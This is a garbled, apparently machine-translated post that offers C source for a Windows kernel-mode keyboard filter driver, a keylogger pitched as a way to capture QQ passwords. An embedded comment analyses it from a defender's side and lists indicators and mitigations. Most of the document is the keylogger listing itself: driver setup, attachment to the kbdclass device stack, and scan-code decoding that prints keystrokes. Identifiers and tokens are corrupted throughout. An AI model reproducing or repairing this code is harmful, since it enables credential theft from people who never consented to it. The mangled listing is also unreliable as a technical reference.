The keyboard recorder can capture the QQ Password

Source: Internet
Author: User

Because the QQ password field is specially protected, the password cannot be obtained by remotely injecting into the process to read the content of the password box, or by capturing keyboard messages through hooks. However, a filter on the keyboard driver can record the keystrokes while the QQ password is being typed. The source code is attached below.

/*
 * Reviewer notes on this listing (defensive reading).
 *
 * Status of the text: the listing describes a Windows kernel-mode keyboard
 * filter driver, but it is not compilable as shown. Identifiers were
 * lower-cased, line breaks were lost, and several tokens were altered by
 * machine translation. Read it as a description of a technique.
 *
 * What the visible code does:
 *  - DriverEntry points every major function at a pass-through handler
 *    (kmunhandleirp), overrides create/close/pnp/power and one further slot
 *    with kmread, then calls kmadddevice directly.
 *  - kmadddevice resolves the keyboard class driver object by name
 *    (obreferenceobjectbyname on the "...\kbdclass" string), walks its device
 *    list, creates one device per keyboard device named "\device\mydevice<N>",
 *    and attaches it with ioattachdevicetodevicestack. The attachment is done
 *    at load time by name lookup, not through a PnP AddDevice callback.
 *  - kmread copies the stack location, registers kmreadcompletion with
 *    iosetcompletionroutineex, and forwards the IRP to the attached device.
 *  - kmreadcompletion reads bytes [2] and [4] of the system buffer
 *    (presumably the scan code and the make/break flag of the keyboard input
 *    record -- confirm against ntddkbd.h), tracks caps/shift/num state in
 *    globals, and hands key-down scan codes to kmprintkey.
 *  - kmprintkey indexes asciitbl, four consecutive sub-tables of 84 entries
 *    (normal, caps, shift, caps+shift), and prints printable characters
 *    through a debug-print call (the "dbuplint" token looks like a garbled
 *    DbgPrint). No file or network sink is visible in this listing.
 *
 * Indicators a defender can derive from the listing:
 *  - An unexpected device object attached above a keyboard class device;
 *    here the name pattern is \Device\MyDevice<N>. Walking the keyboard
 *    device stack in a kernel debugger or a device-tree viewer shows it.
 *  - A driver that declares its own prototype for ObReferenceObjectByName
 *    (an undocumented export) and references IoDriverObjectType together
 *    with the kbdclass driver name.
 *  - The debug string "this is my driver, henzox!" emitted at load.
 *
 * Mitigation context: loading any kernel driver requires administrative
 * rights and, on 64-bit Windows, a signature accepted by the kernel-mode
 * code-signing policy. Driver-load telemetry (service-install events, Sysmon
 * driver-load events), memory integrity (HVCI) and application-control
 * driver policies are the controls that constrain this class of filter.
 */
# Define dbg 1 # include <ntddk. h> # include <ntstrsafe. h> # include "keymonitor. H "extern pobject_type iodriverobjecttype; pio_stack_location g_islcompletion; int g_caps, g_shift, g_num; unsigned char asciitbl [] = {0x00, 0x1b, 0x31, 0x32, 0x33, 0x34, 0x35, 0x36, 0x37, 0x38, 0x39, 0x30, 0x2d, 0x3d, 0x08, 0x09, // normal0x71, 0x77, 0x65, 0x72, 0x74, 0x79, 0x75, 0x69, 0x6f, 0x70, 0x5b, 0x5d, 0x0d, 0x00, 0x61, 0x73, 0x64, 0x66, 0x67, 0x68, 0x6a, 0x6b, 0x6c, 0x3b, 0x27, 0x60, 0x00, 0x5c, 0x7a, 0x78, 0x63, 0x76, 0x62, 0x6e, 0x6d, 0x2c, 0x2e, 0x2f, 0x00, 0x2a, 0x00, 0x20, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x37, 0x38, 0x39, 0x2d, 0x34, 0x35, 0x36, 0x2b, 0x31,0x32, 0x33, 0x30, 0x2e, 0x00, 0x1b, 0x31, 0x32, 0x33, 0x34, 0x35, 0x36, 0x37, 0x38, 0x39, 0x30, 0x2d, 0x3d, 0x08, 0 X09, // caps0x51, 0x57, 0x45, 0x52, 0x54, 0x59, 0x55, 0x49, 0x4f, 0x50, 0x5b, 0x5d, 0x0d, 0x00, 0x41, 0x53,0x44, 0x46, 0x47, 0x48, 0x4a, 0x4b, 0x4c, 0x3b, 0x27, 0x60, 0x00, 0x5c, 0x5a, 0x58, 0x43, 0x56, 0x42, 0x4e, 0x4d, 0x2c, 0x2e, 0x2f, 0x00, 0x2a, 0x00, 0x20, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x37, 0x38, 0x39, 0x2d, 0x34, 0x35, 0x36, 0x2b, 0x31,0x32, 0x3 3, 0x30, 0x2e, 0x00, 0x1b, 0x21, 0x40, 0x23, 0x24, 0x25, 0x5e, 0x26, 0x2a, 0x28, 0x29, 0x5f, 0x2b, 0x08, 0x09, // shift0x51, 0x57, 0x45, 0x52, 0x54, 0x59, 0x55, 0x49, 0x4f, 0x50, 0x7b, 0x7d, 0x0d, 0x00, 0x41, 0x53,0x44, 0x46, 0x47, 0x48, 0x4a, 0x4b, 0x4c, 0x3a, 0x22, 0x7e, 0x00, 0x7c, 0x5a, 0x58, 0x43, 0x56, 0x42, 0x4e, 0x4d, 0x3c, 0x3e, 0x3f, 0x00, 0x2a, 0x00, 0x20, 0x00, 0x00, 0x00, 0x00, 0x00, 0x0 0, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x37, 0x38, 0x39, 0x2d, 0x34, 0x35, 0x36, 0x2b, 0x31,0x32, 0x33, 0x30, 0x2e, 0x00, 0x1b, 0x21, 0x40, 0x23, 0x24, 0x25, 0x5e, 0x26, 0x2a, 0x28, 0x29, 0x5f, 0x2b, 0x08, 0x09, // caps + shift0x71, 0x77, 0x65, 0x72, 0x74, 0x79, 0x75, 0x69, 0x6f, 0x70, 0x7b, 0x7d, 0x0d, 0x00, 0x61, 0x73,0x64, 0x66, 0x67, 0x68, 0x6a, 0x6b, 0x6c, 
0x3a, 0x22, 0x7e, 0x00, 0x7c, 0x7 A, 0x78, 0x63, 0x76,0x62, 0x6e, 0x6d, 0x3c, 0x3e, 0x3f, 0x00, 0x2a, 0x00, 0x20, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x37, 0x38, 0x39, 0x2d, 0x34, 0x35, 0x36, 0x2b, 0x31,0x32, 0x33, 0x30, 0x2e}; ntstatusobreferenceobjectbyname (_ in punicode_string objectname, _ in ulong attributes, _ in_opt paccess_state accessstate, _ in_opt access_mask desiredaccess, _ in Pobject_type objecttype, _ in partition accessmode, _ inout_opt pvoid parsecontext, _ out pvoid * object); void kmunload (in pdriver_object pdriverobject); ntstatus kmunhandleirp (device_object * deviceobject, IRP * IRP); ntstatus kmopenclose (device_object * deviceobject, IRP * IRP); ntstatus kmpnp (device_object * deviceobject, IRP * IRP); ntstatus kmpower (device_object * deviceobject, IRP * IRP); ntstatus Kmadddevice (in pdriver_object pdriverobject, in punicode_string puserviceregpath); ntstatus kmread (device_object * deviceobject, IRP * IRP); ntstatus kmreadcompletion ); void kmprintkey (uchar Sch); ntstatus DriverEntry (in pdriver_object pdriverobject, in punicode_string puserviceregpath) {int I = 0; kdprint ("this is my driver, henzox! \ N "); pdriverobject-> driverunload = kmunload; for (I = 0; I <irp_mj_maximum_function + 1; I ++) {pdriverobject-> majorfunction [I] = kmunhandleirp;} pdriverobject-> majorfunction [irp_mj_create] = kmopenclose; pdriverobject-> majorfunction [irp_mj_close] = kmopenclose; pdriverobject-> majorfunction [irp_mj_pnp] = kmpnp; pdriverobject-> majorfunction [irp_mj_power] = kmpower; pdriverobject-> majorfunction [I Parameters] = kmread; return kmadddevice (pdriverobject, puserviceregpath);} void kmunload (in pdriver_object pdriverobject) {pdevice_object tmpdevice; Specify mydeviceextension; kdprint! \ N "); tmpdevice = pdriverobject-> deviceobject; while (tmpdevice) {pdevice_object nextdevice; kdprint (" delete partition BJ: 0x % P. 
\ n ", tmpdevice); mydeviceextension = (pmy_device_extension) tmpdevice-> deviceextension; // If the completion routine is not executed, cancel the completion routine if (mydeviceextension-> islcompletion) {mydeviceextension-> islcompletion-> completionroutine = NULL; // only a few flags related to the completion routine are removed. Other flags in the stack are very important and cannot be removed from mydeviceextension-> islcomp Letion-> Control & = ~ (Response | response | sl_invoke_on_error);} iodetachdevice (mydeviceextension-> attachedto); nextdevice = tmpdevice-> nextdevice; iodeletedevice (tmpdevice); tmpdevice = nextdevice ;}} ntstatus kmunhandleirp (device_object * deviceobject, IRP * IRP) {kdprint ("IRP: % d \ n", iogetcurrentirpstacklocation (IRP)-> majorfunction); ioskipcurrentirpstacklocation ); return iocalldriver (PM Y_device_extension) deviceobject-> deviceextension)-> attachedto, IRP);} ntstatus kmopenclose (device_object * deviceobject, IRP * IRP) {kdprint ("kmopenclose. \ n "); IRP-> iostatus. status = STATUS_SUCCESS; IRP-> iostatus. information = 0; iocompleterequest (IRP, io_no_increment); return STATUS_SUCCESS;} ntstatus kmpnp N (IRP); kdprint ("kmpnp. \ n "); Switch (PIO-> minorfunction) {default: ioskipcurrentirpstacklocation (IRP); iocalldriver (pmy_device_extension) deviceobject-> deviceextension)-> attachedto, IRP ); break;} return STATUS_SUCCESS;} ntstatus kmpower (device_object * deviceobject, IRP * IRP) {kdprint ("kmpower. 
\ n "); ioskipcurrentirpstacklocation (IRP); postartnextpowerirp (IRP); Return pocalldriver (pmy_device _ Extension) deviceobject-> deviceextension)-> attachedto, IRP);} ntstatus kmadddevice (in pdriver_object pdriverobject, in bytes) {unicode_string delimiter; pdriver_object kbddriver; ntstatus status; pdevice_object tmpdevice, mydevice; unicode_string usdevicename; wchar buff [64]; int Index = 0; pmy_device_extension deviceextension; rtlinitunicodestring (& usobjectname, l "\ dri Ver \ kbdclass "); status = obreferenceobjectbyname (& usobjectname, obj_case_insensitive, null, 0, iodriverobjecttype, kernelmode, null, (pvoid) & kbddriver); If (! Nt_success (Status) {kdprint ("find the KBD class failed! \ N "); Return status;} tmpdevice = kbddriver-> deviceobject; while (tmpdevice) {swprintf (buff, l" \ device \ mydevice % d ", index ++); rtlinitunicodestring (& usdevicename, buff); status = iocreatedevice (pdriverobject, sizeof (my_device_extension), & usdevicename, tmpdevice-> devicetype, tmpdevice-> characteristics, false, & mydevice); If (! Nt_success (Status) {obdereferenceobject (kbddriver); Return status;} kdprint ("cmdbj: 0x % P. \ n ", mydevice); ioattachdevicetodevicestack (mydevice, tmpdevice); deviceextension = (pmy_device_extension) mydevice-> deviceextension; deviceextension-> attachedto = tmpdevice; /* setup my device */mydevice-> stacksize = tmpdevice-> stacksize + 1; mydevice-> flags | = (tmpdevice-> flags & (do_buffered_io); // at Io Flags are assigned to some flags when createdevice is created. These flags should be retained here (such as do_device_has_name, which involves reference count) tmpdevice = tmpdevice-> nextdevice;} obdereferenceobject (kbddriver ); return STATUS_SUCCESS;} ntstatus kmread (device_object * deviceobject, IRP * IRP) {pmy_device_extension mydeviceextension; // kdprint ("kmread. 
\ n "); mydeviceextension = (pmy_device_extension) deviceobject-> deviceextension; iocopycurrentirpstacklocationtonext (IRP );/* Iosetcompletionroutine can be used only when the driver ensures that the routine is not uninstalled before it is called. If not, iosetcompletionroutineex must be used, enable the kernel to prevent the driver from being uninstalled * // * iosetcompletionroutine (IRP, kmreadcompletion, null, true); */iosetcompletionroutineex (deviceobject, IRP, kmreadcompletion, null, true, true, true); mydeviceextension-> islcompletion = iogetnextirpstacklocation (IRP); Return iocalldriver (pmy_device_extension) deviceobject-> Deviceextension)-> attachedto, IRP);} ntstatus kmreadcompletion (pdevice_object deviceobject, pirp IRP, pvoid context) {pmy_device_extension mydeviceextension; puchar Buff; int Len; // kdprint ("kmreadcompletion: Key -- 0x % P \ n", * (Pulong) IRP-> associatedirp. systembuffer);/* The completion routine of this IRP has been executed, and the stack will be automatically cleared when the function is executed, so the stack should not be referenced */mydeviceextension = (pmy_device_extension) deviceobject-> deviceextension; mydeviceexte Nsion-> islcompletion = NULL; If (nt_success (IRP-> iostatus. status) {// because the device flag is do_buffered_io, the kernel allocates the buffer buff = IRP-> associatedirp. systembuffer; // The returned values are generally stored in information, that is, Len = IRP-> iostatus. information; If (buff [4] = 0) {/* press the keyboard */switch (buff [2]) {Case 0x3a: g_caps = (g_caps = 1 )?; Break; Case 0x2a: Case 0x36: g_shift = 1; break; Case 0x45: g_num = (g_num = 1 )?; Break; default: kmprintkey (buff [2]); break ;}} else if (buff [4] = 1) {/* release of keyboard */switch (buff [2]) {Case 0x2a: Case 0x36: g_shift = 0; break; default: Break ;}}} if (IRP-> pendingreturned) {iomarkirppending (IRP);} return IRP-> iostatus. 
status;} void kmprintkey (uchar Sch) {uchar CH = 0; If (Sch <0x47) | (Sch> = 0x47 & Sch <0x54) & g_num = 0) {CH = asciitbl [Sch]; if (g_shift & g_caps) CH = asciitbl [Sch + 84*3]; else if (g_shift = 1) CH = asciitbl [Sch + 84*2]; else if (g_caps = 1) CH = asciitbl [Sch + 84];} If (CH = 0x08) {// dbuplint ("return ");} if (CH> = 0x20 & Ch <0x7f) {dbuplint ("% C", CH );}}

The keyboard mapping table comes from the Internet. The entire code listing is for entertainment only.
